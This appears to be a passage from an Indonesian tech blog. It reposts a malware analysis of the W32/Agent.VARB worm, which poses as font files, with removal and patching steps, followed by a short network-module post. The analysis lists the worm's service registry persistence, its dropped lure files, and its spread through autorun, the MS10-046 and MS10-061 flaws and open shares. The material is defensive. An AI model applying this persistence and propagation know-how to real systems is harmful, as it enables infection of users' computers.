<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">94.75.xx.xx</span></div></li>
</ul><div align="center" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><ul><li> <div align="justify" class="western" style="margin-bottom: 0in;"><b>Mendownload file agar tetap terupdate</b></div></li>
</ul><div align="justify" style="margin-bottom: 0in; margin-left: 0.5in;">Tidak mau kalah dengan program antivirus, trojan <i>W32/Agent.VARB</i> juga melakukan download beberapa file tertentu dari Remote Server yang bertujuan agar <span lang="en-US">worm</span> tetap terupdate dan tidak mudah dikenali oleh antivirus.</div><div class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;"><b>File trojan </b><i><b>W32/Agent.VARB</b></i></div><div align="justify" class="western" style="margin-bottom: 0in;">File worm <i>W32/Agent.VARB</i> dibuat menggunakan bahasa pemrograman C. Berikut ciri-ciri file utama trojan sebagai berikut : (lihat gambar 3)</div><ul><li> <div align="justify" style="margin-bottom: 0in;">Berukuran 63 kb (tergantung varian yg ditemukan)</div></li>
<li> <div align="justify" style="margin-bottom: 0in;">Type file “Font File” </div></li>
<li> <div align="justify" style="margin-bottom: 0in;">Icon file “Font</div></li>
<li> <div align="justify" style="margin-bottom: 0in;">Berekstensi “fon”</div></li>
</ul><div align="center" class="western" style="margin-bottom: 0in;"><img align="bottom" border="0" height="144" src="http://vaksin.com/2011/0711/worm%20font/worm%20font_html_76bcc503.jpg" width="432" /></div><div align="center" style="margin-bottom: 0in; margin-left: 0.5in;"><i><span style="font-size: x-small;">Gambar 3, File trojan </span><span style="font-size: x-small;">W32/Agent.VARB</span></i></div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;"><span lang="en-US">File-file tersebut yaitu ;</span></div><ul><li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">autorun.inf</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">myporno.avi.lnk</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">pornmovs.lnk</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">setup50039.fon</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">setup50039.lnk</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">setup50045.fon</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">setup50045.lnk</span></div></li>
</ul><div align="justify" lang="en-US" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;">Selain file tersebut, worm <i>Agent.VARB</i> akan mendownload beberapa file lain, yaitu sebagai berikut :</div><ul><li> <div align="justify" style="margin-bottom: 0in;">C:\Documents and Settings\%user%\Local Settings\Temp\srv[acak].tmp (1 kb)</div></li>
<li> <div align="justify" style="margin-bottom: 0in;">C:\Documents and Settings\%user%\Local Settings\Temp\srv[acak].ini (1 kb)</div></li>
</ul><div class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;"><b>Modifikasi Registry</b></div><div align="justify" class="western" style="margin-bottom: 0in;"><a href="http://www.blogger.com/post-edit.g?blogID=3269024304902780110&postID=7978334427651750031" name="_GoBack"></a> Beberapa modifikasi registry yang dilakukan oleh worm<span lang="en-US"> </span><span lang="en-US"><i>Agent.VARB</i></span> antara lain sebagai berikut :</div><ul><li> <div align="justify" class="western" style="margin-bottom: 0in;">Menambah Registry</div></li>
</ul><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\srv<span lang="en-US">[acak]</span></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">(Default) = "service"</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srv<span lang="en-US">[acak]</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">Type = 0x00000020</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">Start = 0x00000002</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">ErrorControl = 0x00000001</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">ImagePath = "%System%\svchost.exe -k netsvcs"</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">DisplayName = "srv</span><span style="font-family: Calibri,serif;"><span lang="en-US">[acak]</span></span><span style="font-family: Calibri,serif;">"</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">ObjectName = "LocalSystem"</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srv[acak]\parameters</span></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">servicedll = "\\?\globalroot\Device\HarddiskVolume1\DOCUME~1\%UserName%\LOCALS~1\Temp\srv[acak].tmp"</span></div><div align="justify" class="western" lang="en-US" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srv[acak]\Security</span></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0</span></div><div align="justify" class="western" lang="en-US" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">HKEY_LOCAL_MACHINE\SYSTEM\<span lang="en-US">Current</span>ControlSet\Control\SafeBoot\Minimal\srv<span lang="en-US">[acak]</span></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">(Default) = "service"</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">HKEY_LOCAL_MACHINE\SYSTEM\<span lang="en-US">Current</span>ControlSet\Services\srv<span lang="en-US">[acak]</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">Type = 0x00000020</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">Start = 0x00000002</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">ErrorControl = 0x00000001</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">ImagePath = "%System%\svchost.exe -k netsvcs"</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">DisplayName = "srv</span><span style="font-family: Calibri,serif;"><span lang="en-US">[acak]</span></span><span style="font-family: Calibri,serif;">"</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span style="font-family: Calibri,serif;">ObjectName = "LocalSystem"</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srv[acak]\parameters</span></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">servicedll = "\\?\globalroot\Device\HarddiskVolume1\DOCUME~1\%UserName%\LOCALS~1\Temp\srv[acak].tmp"</span></div><div align="justify" class="western" lang="en-US" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srv[acak]\Security</span></div><div class="western" style="line-height: 100%; margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0</span></div><div align="justify" class="western" lang="en-US" style="margin-bottom: 0in;"><br />
</div><ul><li> <div align="justify" class="western" style="margin-bottom: 0in;">Me<span lang="en-US">rubah</span> Registry</div></li>
</ul><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">Cookies =</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">History =</div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;"><b>Metode Penyebaran</b></div><div align="justify" class="western" style="margin-bottom: 0in;">Beberapa cara <span lang="en-US">worm</span> <i>W32/</i><span lang="en-US"><i>Agent.VARB </i></span>melakukan penyebaran yaitu sebagai berikut :</div><ul><li> <div align="justify" class="western" style="margin-bottom: 0in;"><b>Removable drive/disk</b></div></li>
</ul><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">Metode ini adalah metode yang umum dilakukan oleh para pengguna komputer. <span lang="en-US">worm</span> (memanfaatkan celah autoplay) membuat beberapa file agar menginfeksi komputer yaitu :</div><ul><ul><li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">autorun.inf</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">myporno.avi.lnk</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">pornmovs.lnk</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">setup50039.fon</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">setup50039.lnk</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">setup50045.fon</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">setup50045.lnk</span></div></li>
</ul></ul><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 1.03in;"><br />
</div><div style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">Selain itu, dengan memanfaatkan celah keamanan </span><span lang="en-US"><b>MS10-046</b></span><span lang="en-US"> (</span><span lang="en-US"><i>Windows Icon handler</i></span><span lang="en-US">) maka file shortcut/LNK akan langsung dieksekusi pada saat drive tersebut diakses</span>.</div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><ul><li> <div align="justify" class="western" style="margin-bottom: 0in;"><b>Jaringan LAN</b></div></li>
</ul><div align="justify" style="margin-bottom: 0in; margin-left: 0.5in;">Salah satu metode utama yang digunakan untuk melakukan penyebaran yaitu menggunakan jaringan LAN. Dengan me<span lang="en-US">manfaatkan file sharing yang terbuka (full), worm melakukan penyebaran file. Sehingga komputer yang akan mengkases file sharing akan terinfeksi dengan mudah (juga ikut memanfaatkan celah </span><span lang="en-US"><b>MS10-046</b></span><span lang="en-US">). </span> </div><div align="justify" lang="en-US" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="justify" style="margin-bottom: 0in; margin-left: 0.5in;"><span lang="en-US">Selain itu, dengan memanfaatkan celah keamanan </span><span lang="en-US"><b>MS10-061</b></span><span lang="en-US"> (</span><span lang="en-US"><i>Windows Print Spooler</i></span><span lang="en-US">) pada komputer yang mengkases komputer Print Server yang telah terinfeksi worm jenis ini.</span></div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;"><b>Pembersihan Virus/</b><span lang="en-US"><b>Worm</b></span></div><ol><li> <div align="justify" class="western" style="margin-bottom: 0in;">Putuskan koneksi jaringan/internet.</div></li>
</ol><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><ol start="2"><li> <div align="justify" class="western" style="margin-bottom: 0in;"><span lang="en-US">Matikan “System Restore” (Windows XP/ME) (lihat gambar 4)</span></div></li>
</ol><ul><li> <div style="margin-bottom: 0in;">Klik kanan My Computer, pilih Properties.</div></li>
<li> <div style="margin-bottom: 0in;">Pilih tab System Restore, beri ceklist pilihan Turn off System restore</div></li>
<li> <div style="margin-bottom: 0in;">Klik Apply, Klik OK.</div></li>
</ul><div align="center" style="margin-bottom: 0in; margin-left: 0.5in;"><img align="bottom" border="0" height="336" src="http://vaksin.com/2011/0711/worm%20font/worm%20font_html_4262118.png" width="288" /></div><div align="center" style="margin-bottom: 0in; margin-left: 0.5in;"><i>Gambar 4, System Restore dahulu supaya dalat membasmi virus dengan tuntas</i></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><ol start="3"><li> <div align="justify" class="western" style="margin-bottom: 0in;">Matikan dan hapus <span lang="en-US">worm</span> <i>W32/</i><span lang="en-US"><i>Agent.VARB</i></span></div></li>
</ol><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">Lakukan langkah-langkah berikut :</div><ol type="a"><li> <div align="justify" class="western" style="margin-bottom: 0in;">Download tools untuk membersihkan <span lang="en-US">worm</span> <i>W32/</i><span lang="en-US"><i>Agent.VARB</i></span> pada komputer yang belum terinfeksi pada link berikut :</div></li>
</ol><div align="center" class="western" style="margin-bottom: 0in; margin-left: 1in;"><i><span style="font-style: normal;">Norman Malware Cleaner</span></i></div><div align="center" class="western" style="margin-bottom: 0in; margin-left: 1in;"><i><a href="http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe">http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe</a> </i> </div><div align="center" class="western" style="margin-bottom: 0in; margin-left: 1in;"><br />
</div><ol start="2" type="a"><li> <div align="justify" class="western" style="margin-bottom: 0in;">Setelah selesai, kompress file tersebut hingga menjadi file zip.</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Copy file tersebut dan letakkan dimana saja pada komputer yang terinfeksi.</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Klik kanan file zip tersebut, kemudian klik explore.</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Klik 2x file yang sudah di-explore tersebut untuk menjalankan, kemudian klik Run.</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Klik Start untuk memulai Scan, dan klik Yes untuk memulai.</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Biarkan hingga proses scan selesai.</div></li>
</ol><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><ol start="4"><li> <div align="justify" class="western" style="margin-bottom: 0in;">Repair registri yang telah dimodifikasi.</div></li>
</ol><ul><ul><li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">Hapus key registry yang telah dibuat oleh worm dengan langkah sebagai berikut :</span></div></li>
</ul></ul><ul><li> <div align="justify" style="margin-bottom: 0in;">Klik Menu [Start]</div></li>
<li> <div align="justify" style="margin-bottom: 0in;">Klik [Run]</div></li>
<li> <div align="justify" style="margin-bottom: 0in;">Ketik _"regedit", kemudian klik tombol [OK] hingga muncul tampilan "Registry Editor"</div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">Cari</span> <span lang="en-US">dan hapus </span>key berikut :</div></li>
</ul><ul><li> <div align="justify" style="margin-bottom: 0in;">HKEY_LOCALMACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\srv<span lang="en-US">[acak]</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srv<span lang="en-US">[acak]</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\srv<span lang="en-US">[acak]</span></div></li>
<li> <div align="justify" style="margin-bottom: 0in;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srv<span lang="en-US">[acak]</span></div></li>
</ul><div align="justify" class="western" lang="en-US" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><ul><ul><li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">Rubah key registri yang telah dimodifikasi oleh worm dengan langkah sebagai berikut :</span></div></li>
</ul></ul><ul><li> <div align="justify" style="margin-bottom: 0in;">Klik Menu [Start]</div></li>
<li> <div align="justify" style="margin-bottom: 0in;">Klik [Run]</div></li>
<li> <div align="justify" style="margin-bottom: 0in;">Ketik _"regedit", kemudian klik tombol [OK] hingga muncul tampilan "Registry Editor"</div></li>
<li> <div align="justify" style="margin-bottom: 0in;"><span lang="en-US">Cari</span> <span lang="en-US">dan rubah </span>key berikut <span lang="en-US">menjadi </span>:</div></li>
</ul><ul><li> <div align="justify" style="margin-bottom: 0in;">HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</div></li>
</ul><div align="justify" style="margin-bottom: 0in; margin-left: 1.25in;"><span lang="en-US">Cookies = C:\Documents and Settings\NetworkService\Cookies</span></div><div align="justify" style="margin-bottom: 0in; margin-left: 1.25in;"><span lang="en-US">History = C:\Documents and Settings\NetworkService\Local Settings\History</span></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><ol start="5"><li> <div align="justify" class="western" style="margin-bottom: 0in;">Bersihkan temporary file dari jejak <span lang="en-US">worm</span>.</div></li>
</ol><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">Lakukan langkah-langkah berikut :</div><ol type="a"><li> <div align="justify" class="western" style="margin-bottom: 0in;">Klik Menu Start -> Run</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Ketik perintah pada kotak open : cleanmgr , kemudian klik OK.</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Pada drive system (C) klik OK, biarkan proses scan drive.</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Setelah muncul jendela Disk Cleanup, beri tanda file yang akan di hapus (terutama Temporary Files), kemudian klik OK.</div></li>
<li> <div align="justify" class="western" style="margin-bottom: 0in;">Tunggu hingga selesai. (lihat gambar 5)</div></li>
</ol><div align="center" class="western" style="margin-bottom: 0in; margin-left: 1in;"><img align="bottom" border="0" height="134" src="http://vaksin.com/2011/0711/worm%20font/worm%20font_html_m5f1f5c18.jpg" width="336" /></div><div align="center" class="western" style="margin-bottom: 0in; margin-left: 1in;"><i><span style="font-size: x-small;">Gambar 5, D</span><span style="font-size: x-small;"><span lang="en-US">isk Cleanup, melakukan pembersihan file temporary Windows</span></span></i></div><div align="center" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><ol start="6"><li> <div align="justify" class="western" style="margin-bottom: 0in;"><span lang="en-US">Install Security Patch </span><span lang="en-US"><b>MS10-046, MS10-061 dan MS10-091</b></span><span lang="en-US"> sesuai dengan versi Windows yang dimiliki. Silahkan download pada link berikut :</span></div></li>
</ol><div align="center" style="margin-bottom: 0in; margin-left: 0.5in;"><span style="color: blue;"><span lang="en-US"><u><a href="http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx"><i>http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx</i></a></u></span></span></div><div align="center" style="margin-bottom: 0in; margin-left: 0.5in;"><span style="color: blue;"><span lang="en-US"><u><a href="http://www.microsoft.com/technet/security/Bulletin/MS10-061.mspx"><i>http://www.microsoft.com/technet/security/Bulletin/MS10-061.mspx</i></a></u></span></span></div><div align="center" style="margin-bottom: 0in; margin-left: 0.5in;"><a href="http://www.microsoft.com/technet/security/Bulletin/MS10-091.mspx"><span lang="en-US"><i>http://www.microsoft.com/technet/security/Bulletin/MS10-091.mspx</i></span></a></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><ol start="7"><li> <div align="justify" class="western" style="margin-bottom: 0in;">Untuk pembersihan yang optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang ter-update dan mengenali <span lang="en-US">worm</span> ini dengan baik.</div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
REFRENSI.<br />
<a href="http://vaksin.com/2011/0711/worm%20font/worm%20font.html">http://vaksin.com/2011/0711/worm%20font/worm%20font.html</a></div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div></li>
</ol>bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-45510986080751224432011-08-16T00:33:00.000-07:002011-08-16T00:33:19.046-07:00SETING ULANG KONEKSI JARINGAN BERBASIS WAN<br />
<a href="http://www.4shared.com/get/nIY6IpOV/kk16_Melakukan_perbaikan_dan_s.html">http://www.4shared.com/get/nIY6IpOV/kk16_Melakukan_perbaikan_dan_s.html</a><br />
<br />
<h3 class="post-title entry-title"> <a href="http://albanjarycomp.blogspot.com/2009/12/melakukan-perbaikan-danatau-setting.html">MELAKUKAN PERBAIKAN DAN/ATAU SETTING ULANG KONEKSI JARINGAN BERBASIS WAN</a> </h3>Pemanfaatan komputer sebagai sebuah sarana pengembangan pendidikan saat ini<br />
sudah menjadi suatu kebutuhan utama. Hal ini didasarkan kepada beberapa faktor<br />
utama, yaitu :<br />
1. Perkembangan teknologi yang semakin pesat.<br />
Era kesejagatan, dimana perkembangan teknologi merupakan urat nadi utama<br />
kehidupan telah membawa perubahan besar terhadap tatanan dan cara hidup<br />
manusia. Setiap jenis pekerjaan dituntut untuk dapat dikerjakan dengan cara<br />
yang secepat dan setepat mungkin.<br />
Dunia industri sebagai garda terdepan pembangunan ekonomi mau tidak mau<br />
harus memanfaatkan perkembangan teknologi ini, sebab dengan pemanfaatan<br />
teknologi yang optimal, maka akan tercapai efisiensi dan efektifitas kerja,<br />
meningkatkan ketelitian dalam suatu biang pekerjaan, serta memperluas jenis<br />
pekerjaan yang dapat dilakukan tiap satuan waktu.<br />
Namun, ada masyarakat tertentu yang belum mampu mengikuti perubahan ini.<br />
Mereka terancam terlindas oleh perubahan jaman, sehingga nantinya akan<br />
menjadi penonton di lapangan sendiri dan menjadi tamu di rumah sendiri.<br />
Program keahlian ini mencoba untuk mencegah hal itu terjadi, utamanya dalam<br />
bidang komputerisasi dan pendidikan<br />
2. Komputer, sebagai salah satu perangkat utama pendidikan<br />
Perkembangan teknologi ini juga berimplikasi terhadap pemanfaatan berbagai<br />
sarana dan prarasana teknologi, contohnya adalah komputer.<br />
Beberapa tahun yang lalu, komputer dianggap sebagai sesuatu yang mewah dan<br />
hanya digunakan oleh kalangan tertentu saja. Namun, seiring dengan perubahan<br />
waktu dan tuntutan pekerjaan yang semakin tinggi, maka komputer telah<br />
menjadi suatu hal yang biasa dalam kehidupan sehari-hari.<br />
Pendidikan, utamanya pada SMK bertujuan untuk menghasilkan tenaga yang<br />
terdidik dan terlatih di berbagai bidang. Oleh sebab itu, pengetahuan komputer<br />
mutlak diberikan kepada peserta diklat, agar mereka dapat bersaing di dunia<br />
kerja yang telah memanfaatkan teknologi.<br />
Program keahlian Teknik Komputer dan Jaringan yang merupakan salah satu<br />
program keahlian dari bidang keahlian Teknologi Informasi dan Komunikasi<br />
bertujuan untuk menghasilkan tenaga yang terampil dan kompeten dalam bidang<br />
teknik komputer dan jaringan sebagai garda terdepan dalam menghadapi perubahan<br />
teknologi tersebut.<br />
Oleh sebab itu, modul ini disusun untuk memberikan pengetahuan dasar tentang<br />
jaringan dan trouble shooting pada PC yang terkoneksi jaringan.<br />
Akhirnya, tidak lupa penulis menghaturkan rasa syukur ke hadirat Ilahi atas<br />
tersusunnya modul ini dan menyampaikan terima kasih yang tak terhingga pada<br />
berbagai pihak yang telah banyak membantu terbitnya modul ini.Mengingat<br />
ketidaksempurnaan yang ada di sana sini, penulis juga akan sangat berterima kasih<br />
apabila pembaca dapat memberikan masukan dan saran kepada penulis demi<br />
kesempurnaan modul ini di masa yang akan datang.<br />
<br />
selengkapnya klik aja judul di atas<br />
terima kasih<br />
BY : tkj student<br />
bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0